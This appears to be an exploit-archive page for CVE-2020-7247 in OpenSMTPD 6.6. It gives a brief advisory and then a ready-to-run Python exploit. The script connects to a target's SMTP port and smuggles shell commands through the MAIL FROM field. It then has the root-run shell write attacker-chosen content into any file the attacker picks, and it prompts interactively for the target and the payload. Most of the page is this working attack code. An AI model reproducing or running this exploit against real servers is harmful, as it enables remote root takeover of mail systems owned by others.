OpenBSD OpenSMTPD 6.6 Remote Code Execution

smtp_mailaddr in smtp_session.c in OpenSMTPD version 6.6, as used in OpenBSD version 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.


MD5 | 3e9db1a4402d4b64eb361d4015b2e24b

# Exploit Title: OpenBSD OpenSMTPD Remote Code Execution Vulnerability
# Date: 05/04/2021
# Exploit Author: Tobias Marcotto
# Tested on: Kali Linux x64
# Version: 6.6
# Description: smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.
# CVE : CVE-2020-7247


*********************************************************************************************************


import socket, time
import sys

HOST = input("what is the ip address of the host?: ")
PORT = 25 # The same port as used by the server
s = None

writeto = input("Which file do you want to write to?: ")#raw inputen
writewhat = input("What do you want to write to the file?: ")
payload = b"""\r\n
#0\r\n
#1\r\n
#2\r\n
#3\r\n
#4\r\n
#5\r\n
#6\r\n
#7\r\n
#8\r\n
#9\r\n
#a\r\n
#b\r\n
#c\r\n
#d\r\n
echo '"""+writewhat.encode()+b"""' > """+writeto.encode()+b"""
.
"""

for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
s = socket.socket(af, socktype, proto)
except OSError as msg:
s = None
continue
try:
s.connect(sa)
except OSError as msg:
s.close()
s = None
continue
break
if s is None:
print('could not open socket')
sys.exit(1)
with s:
data = s.recv(1024)
print('Received', repr(data))
time.sleep(1)
print('sending')
s.send(b"helo test.com\r\n")
data = s.recv(1024)
print('Received', repr(data))
s.send(b"MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>\r\n")
time.sleep(1)
data = s.recv(1024)
print('Received', repr(data))
s.send(b"RCPT TO:<root>\r\n")
data = s.recv(1024)
print('Received', repr(data))
s.send(b"DATA\r\n")
data = s.recv(1024)
print('Received', repr(data))
s.send(payload)
data = s.recv(1024)
print('Received', repr(data))
s.send(b"QUIT\r\n")
data = s.recv(1024)
print('Received', repr(data))
print("done")
s.close()

Related Posts